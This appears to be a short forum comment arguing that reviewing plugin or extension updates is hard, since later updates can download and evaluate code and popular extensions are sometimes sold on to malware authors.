You would need to have code review on every update and to ensure that no code downloads anything it evaluates, and potentially even check for interactions with other plugins which could be compromised to provide eval mechanisms in an effort to “wash hands” of any malicious changes in later updates. (Since the long tail of updates seems to be one of the significant risk factors with less scrupulous actors trying to buy popular extensions for things like ad revenues before later dumping them to people who use them for malware or lousy eventually turning to malware themselves.

A review process can help but sadly it’s got a lot of work to do if it want to actually “solve” the problems here.